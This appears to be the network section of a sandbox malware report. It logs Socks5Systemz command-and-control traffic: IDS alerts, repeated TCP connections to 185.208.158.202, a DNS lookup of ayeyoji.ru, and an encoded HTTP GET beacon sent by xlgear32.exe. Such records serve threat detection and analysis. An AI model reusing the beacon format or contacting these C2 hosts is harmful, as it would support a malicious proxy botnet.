                                                                        2024-11-30T02:34:53.021656+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449891185.208.158.20280TCP
                                                                        2024-11-30T02:34:53.021656+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449891185.208.158.20280TCP
                                                                        2024-11-30T02:34:54.635453+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449896185.208.158.20280TCP
                                                                        2024-11-30T02:34:54.635453+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449896185.208.158.20280TCP
                                                                        2024-11-30T02:34:56.331578+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449901185.208.158.20280TCP
                                                                        2024-11-30T02:34:56.331578+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449901185.208.158.20280TCP
                                                                        2024-11-30T02:34:57.905243+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449905185.208.158.20280TCP
                                                                        2024-11-30T02:34:57.905243+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449905185.208.158.20280TCP
                                                                        2024-11-30T02:34:59.511137+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449910185.208.158.20280TCP
                                                                        2024-11-30T02:34:59.511137+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449910185.208.158.20280TCP
                                                                        2024-11-30T02:35:01.180445+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449915185.208.158.20280TCP
                                                                        2024-11-30T02:35:01.180445+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449915185.208.158.20280TCP
                                                                        2024-11-30T02:35:02.800433+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449920185.208.158.20280TCP
                                                                        2024-11-30T02:35:02.800433+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449920185.208.158.20280TCP
                                                                        2024-11-30T02:35:04.465736+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449923185.208.158.20280TCP
                                                                        2024-11-30T02:35:04.465736+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449923185.208.158.20280TCP
                                                                        Nov 30, 2024 02:34:19.841476917 CET8049800185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:19.845585108 CET4980080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:19.968292952 CET4980080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:19.968590975 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:20.088435888 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:20.088620901 CET8049800185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:20.088771105 CET4980080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:20.089040995 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:20.089040995 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:20.208970070 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:21.511260986 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:21.511567116 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:21.624417067 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:21.744282007 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:22.101311922 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:22.101381063 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.382354975 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.386368036 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.502546072 CET8049803185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:22.502618074 CET4980380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.506269932 CET8049809185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:22.506351948 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.510927916 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:22.630809069 CET8049809185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:23.884879112 CET8049809185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:23.884938955 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:23.998876095 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:23.999216080 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:24.176381111 CET8049814185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:24.176397085 CET8049809185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:24.176506996 CET4980980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:24.176518917 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:24.176803112 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:24.296818972 CET8049814185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:25.556432009 CET8049814185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:25.556492090 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.670952082 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.671250105 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.791266918 CET8049820185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:25.791400909 CET8049814185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:25.791511059 CET4981480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.791538954 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.791766882 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:25.911608934 CET8049820185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:27.189121008 CET8049820185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:27.189408064 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.312123060 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.312432051 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.432490110 CET8049825185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:27.432507038 CET8049820185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:27.432620049 CET4982080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.432646036 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.432925940 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:27.552746058 CET8049825185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:28.850276947 CET8049825185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:28.850327015 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:28.967328072 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:28.967669010 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:29.087527037 CET8049825185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:29.087548971 CET8049828185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:29.087709904 CET4982580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:29.087764978 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:29.087987900 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:29.207875967 CET8049828185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:30.470597982 CET8049828185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:30.470731020 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.592765093 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.593074083 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.713043928 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:30.713177919 CET8049828185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:30.713259935 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.713304043 CET4982880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.713514090 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:30.833376884 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.109592915 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.109688044 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.217515945 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.337502956 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.691086054 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.691157103 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.811235905 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.811549902 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.932055950 CET8049833185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.932080984 CET8049839185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:32.932176113 CET4983380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.932218075 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:32.932424068 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:33.052288055 CET8049839185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:34.309799910 CET8049839185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:34.309928894 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.439785957 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.440141916 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.560129881 CET8049844185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:34.560152054 CET8049839185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:34.560234070 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.560262918 CET4983980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.631422043 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:34.751395941 CET8049844185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:35.942440033 CET8049844185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:35.944752932 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.061141014 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.061429977 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.181315899 CET8049849185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:36.181371927 CET8049844185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:36.181521893 CET4984480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.181535006 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.181797981 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:36.301757097 CET8049849185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:37.661833048 CET8049849185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:37.661937952 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:37.784380913 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:37.784852982 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:37.905019045 CET8049849185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:37.905126095 CET4984980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:37.905194998 CET8049853185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:37.905273914 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:37.905771017 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:38.025670052 CET8049853185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:39.304721117 CET8049853185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:39.304888010 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.420496941 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.420835972 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.540684938 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:39.540762901 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.540852070 CET8049853185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:39.540896893 CET4985380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.541003942 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:39.660795927 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:40.919466972 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:40.919548988 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.030101061 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.150053978 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:41.502412081 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:41.503612995 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.623684883 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.623995066 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.743902922 CET8049864185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:41.744030952 CET8049858185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:41.744155884 CET4985880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.744174004 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.744410038 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:41.864295959 CET8049864185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:43.116338015 CET8049864185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:43.116466045 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.233156919 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.233530998 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.353444099 CET8049864185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:43.353470087 CET8049869185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:43.353588104 CET4986480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.353630066 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.353902102 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:43.473754883 CET8049869185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:44.735771894 CET8049869185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:44.735836983 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:44.842367887 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:44.842696905 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:44.962610006 CET8049873185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:44.962800026 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:44.962877989 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:44.963287115 CET8049869185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:44.963335037 CET4986980192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:45.082739115 CET8049873185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:46.404664040 CET8049873185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:46.404794931 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.521770000 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.522124052 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.641990900 CET8049878185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:46.642059088 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.642117977 CET8049873185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:46.642191887 CET4987380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.642376900 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:46.762418032 CET8049878185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:48.037117958 CET8049878185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:48.037209988 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.154921055 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.155200958 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.275046110 CET8049878185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:48.275084019 CET8049883185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:48.275151014 CET4987880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.275219917 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.275427103 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:48.396260977 CET8049883185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:49.693346024 CET8049883185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:49.693432093 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:49.811206102 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:49.811477900 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:49.931391954 CET8049888185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:49.931528091 CET8049883185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:49.931550980 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:49.931586027 CET4988380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:49.931793928 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:50.051645994 CET8049888185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:51.306162119 CET8049888185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:51.306229115 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:51.473712921 CET4988880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:51.477802038 CET4989180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:51.594193935 CET8049888185.208.158.202192.168.2.4
Nov 30, 2024 02:34:51.594249964 CET | 49888 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:51.597675085 CET | 80 | 49891 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:51.597743034 CET | 49891 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:51.609775066 CET | 49891 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:51.729650021 CET | 80 | 49891 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:53.020618916 CET | 80 | 49891 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:53.021656036 CET | 49891 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:53.139545918 CET | 49891 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:53.139858007 CET | 49896 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:53.259752035 CET | 80 | 49891 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:53.259766102 CET | 80 | 49896 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:53.259852886 CET | 49891 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:53.259881973 CET | 49896 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:53.260059118 CET | 49896 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:53.379936934 CET | 80 | 49896 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:54.635322094 CET | 80 | 49896 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:54.635452986 CET | 49896 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:54.751071930 CET | 49896 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:54.756572962 CET | 49901 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:54.871299028 CET | 80 | 49896 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:54.871359110 CET | 49896 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:54.876502991 CET | 80 | 49901 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:54.876574039 CET | 49901 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:54.876821995 CET | 49901 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:54.996762991 CET | 80 | 49901 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:56.331507921 CET | 80 | 49901 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:56.331578016 CET | 49901 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:56.455981016 CET | 49901 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:56.456423998 CET | 49905 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:56.576117039 CET | 80 | 49901 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:56.576191902 CET | 49901 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:56.576307058 CET | 80 | 49905 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:56.576379061 CET | 49905 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:56.577852964 CET | 49905 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:56.697689056 CET | 80 | 49905 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:57.905153990 CET | 80 | 49905 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:57.905242920 CET | 49905 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:58.016191959 CET | 49905 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:58.016494989 CET | 49910 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:58.136452913 CET | 80 | 49905 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:58.136466026 CET | 80 | 49910 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:58.136523962 CET | 49905 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:58.136563063 CET | 49910 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:58.136842012 CET | 49910 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:58.256668091 CET | 80 | 49910 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:59.511039972 CET | 80 | 49910 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:59.511137009 CET | 49910 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:59.628184080 CET | 49910 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:59.628520012 CET | 49915 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:59.748548985 CET | 80 | 49910 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:59.748567104 CET | 80 | 49915 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:34:59.748604059 CET | 49910 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:59.748658895 CET | 49915 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:59.749279976 CET | 49915 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:34:59.869153976 CET | 80 | 49915 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:35:01.180387020 CET | 80 | 49915 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:35:01.180444956 CET | 49915 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:01.307809114 CET | 49915 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:01.308211088 CET | 49920 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:01.427999973 CET | 80 | 49915 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:35:01.428054094 CET | 49915 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:01.428080082 CET | 80 | 49920 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:35:01.428174973 CET | 49920 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:01.428373098 CET | 49920 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:01.548226118 CET | 80 | 49920 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:35:02.800364017 CET | 80 | 49920 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:35:02.800432920 CET | 49920 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:02.924017906 CET | 49920 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:02.924439907 CET | 49923 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:03.044697046 CET | 80 | 49920 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:35:03.044711113 CET | 80 | 49923 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:35:03.044766903 CET | 49920 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:03.044810057 CET | 49923 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:03.045042992 CET | 49923 | 80 | 192.168.2.4 | 185.208.158.202
Nov 30, 2024 02:35:03.164876938 CET | 80 | 49923 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:35:04.463563919 CET | 80 | 49923 | 185.208.158.202 | 192.168.2.4
Nov 30, 2024 02:35:04.465735912 CET | 49923 | 80 | 192.168.2.4 | 185.208.158.202
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2024 02:33:51.737341881 CET | 51052 | 53 | 192.168.2.4 | 141.98.234.31
Nov 30, 2024 02:33:52.050406933 CET | 53 | 51052 | 141.98.234.31 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 30, 2024 02:33:51.737341881 CET | 192.168.2.4 | 141.98.234.31 | 0xbdc9 | Standard query (0) | ayeyoji.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 30, 2024 02:33:52.050406933 CET | 141.98.234.31 | 192.168.2.4 | 0xbdc9 | No error (0) | ayeyoji.ru | | 185.208.158.202 | A (IP address) | IN (0x0001) | false
• ayeyoji.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 185.208.158.202 | 80 | 3320 | C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 02:33:52.217340946 CET | 317 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1
    Host: ayeyoji.ru
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 30, 2024 02:33:53.594434977 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 30 Nov 2024 01:33:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
